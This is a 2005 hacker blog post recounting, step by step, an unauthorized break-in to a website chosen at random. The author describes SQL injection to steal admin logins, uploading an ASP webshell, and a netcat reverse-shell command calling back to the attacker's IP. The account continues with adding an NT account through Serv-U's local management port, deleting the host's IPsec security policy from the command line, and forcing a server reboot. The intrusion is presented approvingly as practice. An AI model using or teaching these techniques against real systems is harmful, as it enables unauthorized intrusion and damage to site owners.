Six Hard Hours of Penetration


Article author: kEvin1986 Source: kEvin1986's BloG Published: 2005-02-24 10:12:33

Note: This article was published in issue 2 (2005) of "Hacker X Files". Please credit the source when reprinting.

These past few days I had been in a daze, feeling that I had not had any real practice for a long time. So I picked a site at random, took a deep breath, and the penetration began. With SuperScan scanning ports on the side, I wandered around the site and found an SQL injection vulnerability. The database was MSSQL, but I could not get anywhere, probably because of the way the ASP was written versus the injection statements I was using. So I brought out NBSI2 and poked around left and right, but found no usable injection point. After some guessing, I could not find the db_owner user; I had no permissions at all. Guessing table names, I found a manage_user table and obtained a few administrator accounts. Then I appended admin to the URL, and a backend management login actually popped up. I typed in the username and password and the login succeeded. Everything went smoothly and naturally. At this point the SuperScan results came out: only port 80 was open, presumably because of TCP/IP filtering. That is easy enough to deal with, heh. In the backend I saw a file upload page. I tried uploading an ASP program, waited a few seconds, and it actually reported success! Good grief. By now I had gotten into this site far too easily; there was probably nothing more to penetrate, and I was about to give up and look for another machine. But when I browsed the site's C drive, I found that the administrator had actually configured permissions (Figure 1). Heh, I thought this site was fun and wanted to see what he had been up to. In the ASP trojan I found that the host's settings were fairly extreme: the C, D and E drives could not be browsed at all, and the F drive was where the web pages were stored. Its permissions looked like Everyone, but on a closer look the administrator had disabled WSH, so executing commands looked like it would be a bit of trouble.

However, at least one thing made me happy: FSO was available and there was a drive I could use, so I still felt pretty good. Now that I had a webshell, I started on raising privileges. I planned to use the Haiyang 2005 search function to search the F drive for SQL usernames and passwords, but the conn.asp files I found for a few sites showed that the SQL Server was not on this machine but on a remote host, and the account was not a sysadmin user either, so it was of no use. Hmm, this was awkward; I wanted to raise privileges. I tried Shell.Application and found that it could execute programs, but could not pass parameters or return results, so it seemed useless. Later I realised that this weak idea made me take a lot of detours. At this point the penetration felt troublesome, so I called LCX on QQ to discuss a solution. After LCX learned of the host's settings, he told me to write the commands into a batch file; as for the results, they could be redirected into a file under F:/, which I could then read. Reading this, I slapped my forehead: why had I not thought of it? First, using the Haiyang 2005 ASP trojan, I created a BAT file under F:/. Thinking I should at least take a look at the system's users, I wrote net user >> f:/a.txt, executed it with Shell.Application, and went back to the FSO page to refresh. Eh? Why was a.txt not generated? Probably the administrator had set the account the web ran under to have no access to cmd.exe. So I uploaded a cmd.exe from my own machine to F:/ and wrote f:/cmd.exe /c net user >> f:/a.txt. After execution there was an a.txt under F:/, so it seemed my guess was right. Looking at it, the administrator had used group policy to tighten things to an extreme level. No way forward there, so I then looked at which ports were open and found that, besides port 80, the host had 21 and 3389 open. Eh, port 21? Was anyone connected to it? Could my scan have missed it?
So I tried logging in to FTP, and the result was a refusal. Strange.

I could not get in from the front: even if TCP/IP filtering is done, it is done on this machine itself, and I could not get out either. Fine, I uploaded nc and modified the BAT file: f:/nc.exe myip 1986 -e f:/cmd.exe. After executing it I sat at my computer waiting for the shell, and waited, but nc's listening port showed no reaction at all. Damn! Is this the legendary hardware firewall? It seemed so. With no other option I looked through the list of ports and found 127.0.0.1 with port 43958 (Figure 2). Eh? Isn't this Serv-U's local management port? I happened to have a Serv-U privilege escalation tool, so I simply sent it a command to add an NT user, checked, and it had succeeded. Nice. So now let's see about those drives with permissions set. After several executions the result was a cold shower again: the administrator had also banned the System user. I tried cacls, and it still did not work. Really depressing. Now I had the permissions, but no ports; there was nothing else I could control it with. I really wanted to cry without tears. At this point LCX hinted that I could use VIDC to connect back, or Hacker's Door. After a long time I finally got the tools uploaded, but basically it failed, and VIDC did not even succeed. Good grief, this was a tough nut. I had played at security for two and a half years and this was the first time I had met such an extreme host. I really wanted to give up. Looking back at the past four hours, apart from raising privileges I had made no other progress, so I might as well look at what else was worth seeing on this F drive. With a tinge of despair I opened another directory and, out of sheer boredom, found a good thing: there was a "Farm Server Security Configuration.ipsec" file on the host. What was this .ipsec file, an IP Security Policy file? Could this host be using IP security policies?

Thinking about it, that was quite possible. I hurriedly downloaded the file to my machine, added a snap-in in mmc.exe, added IP Security Policy, and imported the file: Ha! Sure enough, a security policy called "Company" appeared (Figure 3). Opening it layer by layer, it really was extreme and left me dazzled: everything from SYN to ICMP was filtered. I learned a lot. Oh, after studying this file I started to guess that the other side's host had been assigned this same security policy. Delete it, and this host would be back on the network. Ha ha. I happened to have a Windows 2000 Resource Kit on my machine, so I extracted ipsecpol.exe, ipsecutil.dll and text2pol.dll from it and sent them to the host. These three files are the tools for operating IPsec from the command line; we only use them to delete this policy assignment. I edited the BAT file and used the Serv-U privilege tool to execute this command: ipsecpol -w reg -p "Company" -o. If nothing went wrong, the security policy named "Company" had been deleted. So the only job left was to restart the system and log in via terminal services. Ah! The more I thought about it, the happier I felt. Finally, I edited the BAT file to use the iisreset /reboot command and executed it. After a long time the site could not be visited; it seemed to be restarting. Excited-ing.

Please indicate the original address when reprinting: https://www.9cbs.com/read-54063.html
